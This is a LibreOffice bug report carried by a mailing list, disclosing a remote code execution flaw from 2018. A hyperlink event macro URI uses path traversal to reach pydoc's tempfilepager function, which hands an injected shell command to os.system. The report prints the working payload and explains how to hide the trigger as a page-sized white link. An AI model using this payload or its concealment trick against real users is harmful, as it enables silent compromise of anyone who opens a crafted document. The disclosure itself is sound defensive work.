https://bugs.documentfoundation.org/show_bug.cgi?id=120675
Bug ID: 120675
Summary: RCE/Shell command execution in LibreOffice/OpenOffice
via script:event-listener
Product: LibreOffice
Version: 6.1.2.1 release
Hardware: All
OS: All
Status: UNCONFIRMED
Severity: normal
Priority: medium
Component: Writer
Assignee: libreoffice-bugs@lists.freedesktop.org
Reporter: a...@cure53.de
Created attachment 145802
--> https://bugs.documentfoundation.org/attachment.cgi?id=145802&action=edit
PoC_linux_drops_file_in_tmp
-----------
Verified on:
Linux
Windows 7/8.1/10
LibreOffice 6.1.2
The vulnerability will only be described for LibreOffice on Linux but a PoC for
OpenOffice/Windows can be provided as well.
-----------
LibreOffice allows to assign so-called "events" to hyperlinks. The user can
define the event (mouseover, onclick, mouseout), which triggers the execution
of a macro.
Currently LibreOffice supports 4 different types of macros: Basic, Java,
JavaScript and Python
(https://wiki.openoffice.org/wiki/Documentation/DevGuide/Scripting/Scripting_Framework_URI_Specification).
The following snippet shows the execution of the predefined python macro
TableSample.py. By using $<func_name>(<parameters>), it is possible to execute
a specific function in a python file:
<script:event-listener
script:language="ooo:script"
script:event-name="dom:mouseover"
xlink:href="vnd.sun.star.script:pythonSamples|TableSample.py$createTable?language=Python&location=share"
xlink:type="simple"/>
The script is located in
/opt/libreoffice6.1/share/Scripts/python/pythonSamples/TableSample.py.
As soon as the user moves his mouse over the hyperlink, the python code gets
executed without any kind of dialog/user confirmation.
The vulnerability in LibreOffice allows to load any python script by traversing
up the file directory:
xlink:href="vnd.sun.star.script:../../../../OtherFile.py$AnyFunc(1,2)?language=Python&location=share"
As the attacker cannot drop a custom python script on the local file system, it
is necessary to abuse an existing python script to achieve remote code
execution.
The following script inside the LibreOffice directory was chosen to achieve
command execution:
Path:
/opt/libreoffice6.1/program/python-core-3.5.5/lib/pydoc.py
Function:
tempfilepager
Code:
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
with open(filename, 'w', errors='backslashreplace') as file:
file.write(text)
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
The tempfilepager function takes two arguments: a text, which is stored in a
temporary file, and a string, which is passed to os.system and therefore
allowing command execution:
vnd.sun.star.script:../../../program/python-core-3.5.5/lib/pydoc.py$tempfilepager('aaa',
touch /tmp/mydroppedfile || )?language=Python&location=share
It must be noted that it is not necessary that python is installed on the
targeted operating system as LibreOffice ships its own python interpreter and
therefore making the PoC really reliable.
As the PoC requires that the user moves the mouse over the hyperlink the size
of the hyperlink text was increased so it takes up the whole page. Additionally
its colour was set to white so it is not visible to the user.
Lastly InBrowseMode was set to true as it increases the size of the page.
The attached PoC will work on Linux - just move the mouse around after opening
the document and touch /tmp/mydroppedfile will gets executed.
To view or modify the payload unzip the odt PoC and modify content.xml, which
contains the vnd.sun.star.script script.
--
You are receiving this mail because:
You are the assignee for the bug._______________________________________________
Libreoffice-bugs mailing list
Libreoffice-bugs@lists.freedesktop.org
https://lists.freedesktop.org/mailman/listinfo/libreoffice-bugs
